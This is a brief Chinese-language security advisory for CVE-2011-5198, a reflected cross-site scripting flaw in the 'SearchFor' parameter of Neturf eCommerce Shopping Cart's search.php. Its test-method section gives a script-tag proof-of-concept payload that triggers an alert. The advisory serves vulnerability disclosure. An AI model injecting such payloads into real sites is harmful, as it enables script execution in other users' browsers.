发布日期:2012-09-23
更新日期:2012-10-02
受影响系统:
neturf eCommerce Shopping Cart
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2011-5198
Neturf eCommerce Shopping Cart是一个网络购物车应用。
Neturf eCommerce Shopping Cart没有正确过滤传递到search.php内"SearchFor"参数的输入,即返回给用户,可被利用在受影响站点的用户浏览器中执行任意HTML和脚本代码。
<*来源:farbodmahini
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Exploit:
#
# ?SearchFor=<script>alert(/farbodmahini/)</script>
#
#
# Demo:
#
# ?SearchFor=<script>alert(/farbodmahini/)</script>
# ?SearchFor=<script>alert(/farbodmahini/)</script>
#
建议: